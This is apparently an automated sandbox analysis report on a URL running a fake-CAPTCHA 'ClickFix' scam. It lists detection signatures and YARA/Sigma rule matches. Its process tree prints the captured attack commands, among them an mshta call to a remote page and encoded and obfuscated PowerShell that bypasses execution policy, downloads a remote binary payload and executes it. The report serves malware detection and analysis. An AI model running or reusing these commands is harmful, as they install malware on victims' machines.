Edit tour
Windows
Analysis Report
http://cipassoitalia.it
Overview
Detection
CAPTCHA Scam ClickFix
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detect drive by download via clipboard copy & paste
Malicious sample detected (through community Yara rule)
Yara detected CAPTCHA Scam ClickFix
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
HTML page contains obfuscated script src
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64_ra
- chrome.exe (PID: 6232 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6904 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2192 --fi eld-trial- handle=194 0,i,634458 9457771235 264,137484 5822340287 6803,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6576 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt p://cipass oitalia.it " MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- mshta.exe (PID: 7516 cmdline:
"C:\Window s\system32 \mshta.exe " https:// solve.bogx .org/awjsx .captcha?u =097be2dd- 7dc7-422c- 9982-42343 73a85ec # ? ''I am n ot a robot - reCAPTC HA Verific ation ID: 4678'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - cmd.exe (PID: 1172 cmdline:
"C:\Window s\System32 \cmd.exe" /c start p owershell -w 1 -Enc UwB0AGEAcg B0AC0AUABy AG8AYwBlAH MAcwAgACIA QwA6AFwAVw BpAG4AZABv AHcAcwBcAF MAeQBzAFcA bwB3ADYANA BcAFcAaQBu AGQAbwB3AH MAUABvAHcA ZQByAFMAaA BlAGwAbABc AHYAMQAuAD AAXABwAG8A dwBlAHIAcw BoAGUAbABs AC4AZQB4AG UAIgAgAC0A VwBpAG4AZA BvAHcAUwB0 AHkAbABlAC AASABpAGQA ZABlAG4AIA AtAEEAcgBn AHUAbQBlAG 4AdABMAGkA cwB0ACAAJw AtAHcAJwAs ACcAaABpAG QAZABlAG4A JwAsACcALQ BlAHAAJwAs ACcAYgB5AH AAYQBzAHMA JwAsACcALQ BuAG8AcAAn ACwAJwAtAE MAbwBtAG0A YQBuAGQAJw AsACcAZwBk AHIAIAAtAC oAOwBTAGUA dAAtAFYAYQ ByAGkAYQBi AGwAZQAgAE MAaQBVACAA KAAuACQARQ B4AGUAYwB1 AHQAaQBvAG 4AQwBvAG4A dABlAHgAdA AuACgAKAAk AEUAeABlAG MAdQB0AGkA bwBuAEMAbw BuAHQAZQB4 AHQAfABNAG UAbQBiAGUA cgApAFsANg BdAC4ATgBh AG0AZQApAC 4AKAAoACQA RQB4AGUAYw B1AHQAaQBv AG4AQwBvAG 4AdABlAHgA dAAuACgAKA AkAEUAeABl AGMAdQB0AG kAbwBuAEMA bwBuAHQAZQ B4AHQAfABN AGUAbQBiAG UAcgApAFsA NgBdAC4ATg BhAG0AZQAp AHwATQBlAG 0AYgBlAHIA fABXAGgAZQ ByAGUALQBP AGIAagBlAG MAdAB7ACQA XwAuAE4AYQ BtAGUALQBs AGkAawBlAC cAJwAqAHQA KgBvAG0AKg BkACcAJwB9 ACkALgBOAG EAbQBlACkA LgBJAG4Adg BvAGsAZQAo ACQARQB4AG UAYwB1AHQA aQBvAG4AQw BvAG4AdABl AHgAdAAuAC gAKAAkAEUA eABlAGMAdQ B0AGkAbwBu AEMAbwBuAH QAZQB4AHQA fABNAGUAbQ BiAGUAcgAp AFsANgBdAC 4ATgBhAG0A ZQApAC4AKA AoACQARQB4 AGUAYwB1AH QAaQBvAG4A QwBvAG4AdA BlAHgAdAAu ACgAKAAkAE UAeABlAGMA dQB0AGkAbw BuAEMAbwBu AHQAZQB4AH QAfABNAGUA bQBiAGUAcg ApAFsANgBd AC4ATgBhAG 0AZQApAC4A UABzAE8AYg BqAGUAYwB0 AC4ATQBlAH QAaABvAGQA cwB8AFcAaA BlAHIAZQAt AE8AYgBqAG UAYwB0AHsA JABfAC4ATg BhAG0AZQAt AGwAaQBrAG UAJwAnACoA bwBtACoAZQ AnACcAfQAp AC4ATgBhAG 0AZQApAC4A SQBuAHYAbw BrAGUAKAAn ACcATgAqAC 0ATwAqACcA JwAsACQAVA BSAFUARQAs ACQAVABSAF UARQApACwA WwBNAGEAbg BhAGcAZQBt AGUAbgB0AC 4AQQB1AHQA bwBtAGEAdA BpAG8AbgAu AEMAbwBtAG 0AYQBuAGQA VAB5AHAAZQ BzAF0AOgA6 AEMAbQBkAG wAZQB0ACkA TgBlAHQALg BXAGUAYgBD AGwAaQBlAG 4AdAApADsA UwBlAHQALQ BJAHQAZQBt ACAAVgBhAH IAaQBhAGIA bABlADoALw BsAFcAIAAn ACcAaAB0AH QAcABzADoA LwAvAHEAdQ AuAGEAeAAv AFQATwBSAG 8AZgAuAGIA aQBuACcAJw A7AFsAUwBj AHIAaQBwAH QAQgBsAG8A YwBrAF0AOg A6AEMAcgBl AGEAdABlAC gAKABHAEkA IABWAGEAcg BpAGEAYgBs AGUAOgBDAG kAVQApAC4A VgBhAGwAdQ BlAC4AKAAo ACgAKABHAE kAIABWAGEA cgBpAGEAYg BsAGUAOgBD AGkAVQApAC 4AVgBhAGwA dQBlAHwATQ BlAG0AYgBl AHIAKQB8AF cAaABlAHIA ZQAtAE8AYg BqAGUAYwB0 AHsAJABfAC 4ATgBhAG0A ZQAtAGwAaQ BrAGUAJwAn ACoAbgBsAC oAZwAnACcA fQApAC4ATg BhAG0AZQAp AC4ASQBuAH YAbwBrAGUA KAAoAFYAYQ ByAGkAYQBi AGwAZQAgAG wAVwApAC4A VgBhAGwAdQ BlACkAKQAu AEkAbgB2AG 8AawBlAFIA ZQB0AHUAcg BuAEEAcwBJ AHMAKAApAC cA MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3228 cmdline:
powershell -w 1 -Enc UwB0AGEAc gB0AC0AUAB yAG8AYwBlA HMAcwAgACI AQwA6AFwAV wBpAG4AZAB vAHcAcwBcA FMAeQBzAFc AbwB3ADYAN ABcAFcAaQB uAGQAbwB3A HMAUABvAHc AZQByAFMAa ABlAGwAbAB cAHYAMQAuA DAAXABwAG8 AdwBlAHIAc wBoAGUAbAB sAC4AZQB4A GUAIgAgAC0 AVwBpAG4AZ ABvAHcAUwB 0AHkAbABlA CAASABpAGQ AZABlAG4AI AAtAEEAcgB nAHUAbQBlA G4AdABMAGk AcwB0ACAAJ wAtAHcAJwA sACcAaABpA GQAZABlAG4 AJwAsACcAL QBlAHAAJwA sACcAYgB5A HAAYQBzAHM AJwAsACcAL QBuAG8AcAA nACwAJwAtA EMAbwBtAG0 AYQBuAGQAJ wAsACcAZwB kAHIAIAAtA CoAOwBTAGU AdAAtAFYAY QByAGkAYQB iAGwAZQAgA EMAaQBVACA AKAAuACQAR QB4AGUAYwB 1AHQAaQBvA G4AQwBvAG4 AdABlAHgAd AAuACgAKAA kAEUAeABlA GMAdQB0AGk AbwBuAEMAb wBuAHQAZQB 4AHQAfABNA GUAbQBiAGU AcgApAFsAN gBdAC4ATgB hAG0AZQApA C4AKAAoACQ ARQB4AGUAY wB1AHQAaQB vAG4AQwBvA G4AdABlAHg AdAAuACgAK AAkAEUAeAB lAGMAdQB0A GkAbwBuAEM AbwBuAHQAZ QB4AHQAfAB NAGUAbQBiA GUAcgApAFs ANgBdAC4AT gBhAG0AZQA pAHwATQBlA G0AYgBlAHI AfABXAGgAZ QByAGUALQB PAGIAagBlA GMAdAB7ACQ AXwAuAE4AY QBtAGUALQB sAGkAawBlA CcAJwAqAHQ AKgBvAG0AK gBkACcAJwB 9ACkALgBOA GEAbQBlACk ALgBJAG4Ad gBvAGsAZQA oACQARQB4A GUAYwB1AHQ AaQBvAG4AQ wBvAG4AdAB lAHgAdAAuA CgAKAAkAEU AeABlAGMAd QB0AGkAbwB uAEMAbwBuA HQAZQB4AHQ AfABNAGUAb QBiAGUAcgA pAFsANgBdA C4ATgBhAG0 AZQApAC4AK AAoACQARQB 4AGUAYwB1A HQAaQBvAG4 AQwBvAG4Ad ABlAHgAdAA uACgAKAAkA EUAeABlAGM AdQB0AGkAb wBuAEMAbwB uAHQAZQB4A HQAfABNAGU AbQBiAGUAc gApAFsANgB dAC4ATgBhA G0AZQApAC4 AUABzAE8AY gBqAGUAYwB 0AC4ATQBlA HQAaABvAGQ AcwB8AFcAa ABlAHIAZQA tAE8AYgBqA GUAYwB0AHs AJABfAC4AT gBhAG0AZQA tAGwAaQBrA GUAJwAnACo AbwBtACoAZ QAnACcAfQA pAC4ATgBhA G0AZQApAC4 ASQBuAHYAb wBrAGUAKAA nACcATgAqA C0ATwAqACc AJwAsACQAV ABSAFUARQA sACQAVABSA FUARQApACw AWwBNAGEAb gBhAGcAZQB tAGUAbgB0A C4AQQB1AHQ AbwBtAGEAd ABpAG8AbgA uAEMAbwBtA G0AYQBuAGQ AVAB5AHAAZ QBzAF0AOgA 6AEMAbQBkA GwAZQB0ACk ATgBlAHQAL gBXAGUAYgB DAGwAaQBlA G4AdAApADs AUwBlAHQAL QBJAHQAZQB tACAAVgBhA HIAaQBhAGI AbABlADoAL wBsAFcAIAA nACcAaAB0A HQAcABzADo ALwAvAHEAd QAuAGEAeAA vAFQATwBSA G8AZgAuAGI AaQBuACcAJ wA7AFsAUwB jAHIAaQBwA HQAQgBsAG8 AYwBrAF0AO gA6AEMAcgB lAGEAdABlA CgAKABHAEk AIABWAGEAc gBpAGEAYgB sAGUAOgBDA GkAVQApAC4 AVgBhAGwAd QBlAC4AKAA oACgAKABHA EkAIABWAGE AcgBpAGEAY gBsAGUAOgB DAGkAVQApA C4AVgBhAGw AdQBlAHwAT QBlAG0AYgB lAHIAKQB8A FcAaABlAHI AZQAtAE8AY gBqAGUAYwB 0AHsAJABfA C4ATgBhAG0 AZQAtAGwAa QBrAGUAJwA nACoAbgBsA CoAZwAnACc AfQApAC4AT gBhAG0AZQA pAC4ASQBuA HYAbwBrAGU AKAAoAFYAY QByAGkAYQB iAGwAZQAgA GwAVwApAC4 AVgBhAGwAd QBlACkAKQA uAEkAbgB2A G8AawBlAFI AZQB0AHUAc gBuAEEAcwB JAHMAKAApA CcA MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3192 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2408 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -ep bypass -nop -Com mand gdr - *;Set-Vari able CiU ( .$Executio nContext.( ($Executio nContext|M ember)[6]. Name).(($E xecutionCo ntext.(($E xecutionCo ntext|Memb er)[6].Nam e)|Member| Where-Obje ct{$_.Name -like'*t*o m*d'}).Nam e).Invoke( $Execution Context.(( $Execution Context|Me mber)[6].N ame).(($Ex ecutionCon text.(($Ex ecutionCon text|Membe r)[6].Name ).PsObject .Methods|W here-Objec t{$_.Name- like'*om*e '}).Name). Invoke('N* -O*',$TRUE ,$TRUE),[M anagement. Automation .CommandTy pes]::Cmdl et)Net.Web Client);Se t-Item Var iable:/lW 'https://q u.ax/TORof .bin';[Scr iptBlock]: :Create((G I Variable :CiU).Valu e.((((GI V ariable:Ci U).Value|M ember)|Whe re-Object{ $_.Name-li ke'*nl*g'} ).Name).In voke((Vari able lW).V alue)).Inv okeReturnA sIs() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 3044 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | ||
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | ||
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | ||
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | ||
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security | ||
Click to see the 1 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: |